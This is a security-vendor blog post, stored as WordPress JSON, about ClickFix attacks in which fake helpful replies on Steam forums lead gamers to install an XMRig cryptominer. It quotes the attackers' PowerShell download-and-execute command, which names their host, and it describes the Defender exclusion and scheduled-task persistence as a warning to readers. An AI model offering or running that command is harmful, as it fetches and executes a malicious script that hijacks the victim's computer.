{"id":56285,"date":"2026-08-17T11:49:32","date_gmt":"2026-08-17T15:49:32","guid":{"rendered":"https:\/\/www.kaspersky.com\/blog\/?p=56285"},"modified":"2026-08-17T11:49:32","modified_gmt":"2026-08-17T15:49:32","slug":"steam-forum-clickfix-attack-irm-iex","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/","title":{"rendered":"Bad advice for gamers: ClickFix hits Steam forums"},"content":{"rendered":"<p>This year has seen a real boom in <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-clickfix\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">ClickFix attacks<\/a>. It\u2019s such a hit with criminals that we barely finish writing about one variation before it\u2019s time to cover the next.<\/p>\n<p>This time, attackers are targeting gamers: tech journalists <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"noopener nofollow\">spotted posts pushing malicious tips<\/a> on Steam forums. Here\u2019s what these posts look like, what malware they\u2019re used to spread, and how to keep your device safe.<\/p>\n<h2>ClickFix finds its way onto Steam forums<\/h2>\n<p>Many gamers turn to their fellow players on Steam forums for help and advice on things like beating a tricky quest, leveling up, scoring the best loot, or working around a bug. And it\u2019s precisely this trust in community advice that attackers have decided to exploit.<\/p>\n<p>The attack starts when criminals reply to someone\u2019s question about game crashes, missing inventory items, or other technical issues. Posing as helpful commenters, they suggest opening PowerShell as an administrator and running a command that supposedly fixes the issue the user is having.<\/p>\n<div id=\"attachment_56289\" style=\"width: 1329px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/08\/17111447\/steam-forum-clickfix-attack-irm-iex-1.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-56289\" class=\"wp-image-56289 size-full\" title=\"A malicious actor's post on a Steam forum\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/08\/17111447\/steam-forum-clickfix-attack-irm-iex-1.jpg\" alt=\"A malicious actor's post on a Steam forum\" width=\"1319\" height=\"947\"><\/a><p id=\"caption-attachment-56289\" class=\"wp-caption-text\">Disguising their post as troubleshooting advice, the malicious actor suggests running PowerShell as an administrator and executing a command that supposedly fixes the user\u2019s issue. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Source<\/a><\/p><\/div>\n<p>As you might guess, running the command doesn\u2019t fix anything\u00a0\u2014 it just opens a whole new can of worms. That\u2019s the whole idea behind ClickFix: using social engineering to trick victims into carrying out unsafe actions themselves while giving the scammers what they need to compromise the device. We\u2019ve covered other ClickFix tricks before\u00a0\u2014 fake CAPTCHAs, bogus browser errors, and more\u00a0\u2014 all of which rely on getting the victim to run the malicious command on their own. You can read more about the <a href=\"https:\/\/www.kaspersky.com\/blog\/clickfix-attack-variations\/55340\/\" target=\"_blank\" rel=\"noopener nofollow\">different variations of ClickFix attacks<\/a> in our earlier post.<\/p>\n<p>The guile of using ClickFix on Steam forums is that the attack may hit not only the player who asked for help; plenty of other gamers who run into the same issue and find the answer via a Google search can fall for it too.<\/p>\n<h2>A quick primer: what\u2019s really behind the <em>irm <\/em>|<em> iex<\/em> command<\/h2>\n<p>Before we get into what attackers actually trick gamers into installing this way, we need to cover some technical background. So, first off, the posts on Steam forums advise unsuspecting would-be victims to run the following command in PowerShell:<\/p>\n<p><code> irm msfconfig.icu | iex<\/code><\/p>\n<p>To someone not intimately familiar with PowerShell, this line might look fairly innocuous\u00a0\u2014 it resembles launching MSConfig, Windows\u2019 built-in system configuration utility, with a few extra parameters.<\/p>\n<p>In reality, though, it\u2019s anything but harmless. Let\u2019s break down what each part of this command actually does:<\/p>\n<ol>\n<li><strong><em>irm<\/em><\/strong> is short for the built-in PowerShell command <em>Invoke-RestMethod<\/em>. It reaches out to the web address specified later in the line and retrieves data in response.<\/li>\n<li><strong><em>icu<\/em><\/strong> is that web address\u00a0\u2014 not the name of some local file as it might appear at first glance. This is the attackers\u2019 server, and it responds to the <strong><em>irm<\/em><\/strong> request with a malicious PowerShell script.<\/li>\n<li><strong><em>iex<\/em><\/strong> is another built-in PowerShell command, <em>Invoke-Expression<\/em>. It takes whatever <strong><em>irm<\/em><\/strong> receives from that web address and executes it as PowerShell code.<\/li>\n<\/ol>\n<p>Once run, this line of PowerShell code downloads a script from the specified site and immediately executes it. As one Reddit user rightly <a href=\"https:\/\/www.reddit.com\/r\/PowerShell\/comments\/181l9lh\/what_is_irm_httpsmassgravedevget_iex\/\" target=\"_blank\" rel=\"noopener nofollow\">pointed out<\/a>, you can safely find out what code would actually be downloaded to your device\u00a0\u2014 without the risk of it running\u00a0\u2014 just by deleting the second part, <strong><em>iex<\/em><\/strong>. Without it, the command will simply download the script\u2019s contents and print them to the PowerShell window without executing them. This gives you the full, unobscured code that you\u2019re being asked to run on your device. Next, let\u2019s look at what these helpful Steam forum posters are actually trying to get gamers to install on their machines.<\/p>\n<h2>A crypto miner, not an optimization tool<\/h2>\n<p>The attackers did their homework: the PowerShell script downloaded from their server does a convincing job of mimicking a Windows optimization utility. Once launched, it shows the user a series of notifications claiming to clear temporary files, flush the DNS cache, update drivers, check the disk for errors, disable unnecessary startup apps, scan the system for malware, repair the Windows image, and verify system file integrity.<\/p>\n<div id=\"attachment_56290\" style=\"width: 960px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/08\/17111803\/steam-forum-clickfix-attack-irm-iex-2.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-56290\" class=\"wp-image-56290 size-full\" title=\"Fake Windows optimization in progress\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/08\/17111803\/steam-forum-clickfix-attack-irm-iex-2.jpg\" alt=\"Fake Windows optimization in progress\" width=\"950\" height=\"436\"><\/a><p id=\"caption-attachment-56290\" class=\"wp-caption-text\">The script displays a stream of messages about various fake optimization tasks to make it look like it\u2019s doing useful maintenance. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Source<\/a><\/p><\/div>\n<p>The real activity, meanwhile, happens behind the scenes. The script starts by checking whether it\u2019s running with administrator privileges. If it is, it creates a hidden working folder at <em>C:\\Windows\\Background<\/em>, and adds it to Microsoft Defender\u2019s exclusion list. From that point on, any files placed in that folder cease to be scanned by Windows\u2019 built-in antivirus.<\/p>\n<p>Next, the script preps the system for the next stage of the attack and downloads an executable from the attackers\u2019 server \u2014 saving it into that same <em>C:\\Windows\\Background<\/em> folder under the legitimate-sounding name <em>system.exe<\/em>.<\/p>\n<p>The downloaded file is <em>XMRig<\/em>, one of the most popular tools for mining the Monero cryptocurrency. <em>XMRig<\/em> itself isn\u2019t malware; it\u2019s a legitimate, open-source mining tool. The problem is that attackers install it on victims\u2019 computers without their knowledge. Once it\u2019s running, the device\u2019s computing power gets hijacked for Monero mining, with the resulting cryptocurrency going straight to the criminals.<\/p>\n<p>This makes gamers\u2019 rigs especially appealing targets: modern gaming PCs pack powerful CPUs and GPUs\u00a0\u2014 exactly the kind of hardware that\u2019s great for mining crypto.<\/p>\n<p>To make sure the malware survives a reboot, the script also creates a new task in Windows Task Scheduler: <em>XMRig-{computer name}<\/em>. From then on, it automatically launches the crypto miner every time the system starts up.<\/p>\n<h2>How to protect your device from crypto miners and other malware<\/h2>\n<p>Unfortunately, many gamers are reluctant to install security software\u00a0\u2014 or keep it running\u00a0\u2014 on their devices. The main culprit is the persistent myth that \u201can antivirus slows down your game\u201d. We\u2019ve covered research on this on our blog before, and the results showed <a href=\"https:\/\/www.kaspersky.com\/blog\/tests-gamers-antiviruses\/47576\/\" target=\"_blank\" rel=\"noopener nofollow\">no significant performance hit<\/a> from running an antivirus while playing.<\/p>\n<p>The same can\u2019t be said for crypto miners, though\u00a0\u2014 they definitely hurt performance, and they wear down your hardware faster to boot. So what can you do to keep your gaming PC and accounts out of harm\u2019s way?<\/p>\n<ul>\n<li>Avoid running PowerShell, Terminal, or other command prompt scripts that strangers suggest you copy and execute \u2014 whether on forums, in chats, or in comments.<\/li>\n<li>Before hitting <em>Enter<\/em> on any command you don\u2019t fully understand, look up what it does and the potential fallout from running it.<\/li>\n<li>Use a<b> <\/b><a href=\"https:\/\/www.kaspersky.com\/lp\/special-offer-for-gamers?icid=gl_bb2023-kdplacehd_acq_ona_smm__all_b2c_blo_lnk____kprem___\" target=\"_blank\" rel=\"noopener nofollow\">reliable security solution with a gaming mode<\/a>\u00a0that will flag malware download attempts in time and block them from running.<\/li>\n<li>Don\u2019t turn off <a href=\"https:\/\/www.kaspersky.com\/lp\/special-offer-for-gamers?icid=gl_bb2023-kdplacehd_acq_ona_smm__all_b2c_blo_lnk____kprem___\" target=\"_blank\" rel=\"noopener nofollow\">protection<\/a> while you play. Using a solution with a dedicated gaming mode is the way to go. <a href=\"https:\/\/www.kaspersky.com\/home-security?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2c_blo_lnk_sm-team______\" target=\"_blank\" rel=\"noopener nofollow\">Kaspersky security products<\/a>\u00a0automatically activate that mode as soon as a game launches, holding off antivirus database updates, notifications, and scheduled disk scans until you\u2019re done playing.<\/li>\n<\/ul>\n<blockquote><p>Curious how else attackers target gamers? Check out our other posts:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/windows-stealer-stealka\/55058\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Stealka stealer: the new face of game cheats, mods, and cracks<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/update-unity-games-cve-2025-59489\/54542\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Vulnerability in Unity game engine<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/gamer-malware-endgame-gear-steam-minecraft\/54336\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Gamers under fire: malware on official websites<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/arcane-stealer-instead-of-cheats-for-minecraft\/53178\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Arcane stealer instead of Minecraft cheats<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/games-with-trojans-in-steam\/53038\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Gamers beware: Trojans have invaded Steam<\/strong><\/a><\/li>\n<\/ul>\n<\/blockquote>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"premium-gamer\">\n","protected":false},"excerpt":{"rendered":"<p>Steam forums are the latest battleground for ClickFix attacks. We break down how attackers disguise themselves as helpful commenters to trick gamers into installing a crypto miner on their PCs.<\/p>\n","protected":false},"author":2726,"featured_media":56286,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2683],"tags":[4650,4718,2640,647,4659,36,4651,513,164,113],"class_list":["post-56285","post","type-post","status-publish","format-standard","has-post-thumbnail","category-threats","tag-clickfix","tag-crypto-miners","tag-cryptocurrencies","tag-gamers","tag-games","tag-malware-2","tag-powershell","tag-social-engineering","tag-steam","tag-windows"],"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/steam-forum-clickfix-attack-irm-iex\/30986\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/26013\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/steam-forum-clickfix-attack-irm-iex\/30815\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/steam-forum-clickfix-attack-irm-iex\/42526\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/steam-forum-clickfix-attack-irm-iex\/30952\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/steam-forum-clickfix-attack-irm-iex\/36479\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/steam-forum-clickfix-attack-irm-iex\/36393\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/gamers\/","name":"gamers"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/56285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2726"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=56285"}],"version-history":[{"count":3,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/56285\/revisions"}],"predecessor-version":[{"id":56291,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/56285\/revisions\/56291"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/56286"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=56285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=56285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=56285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}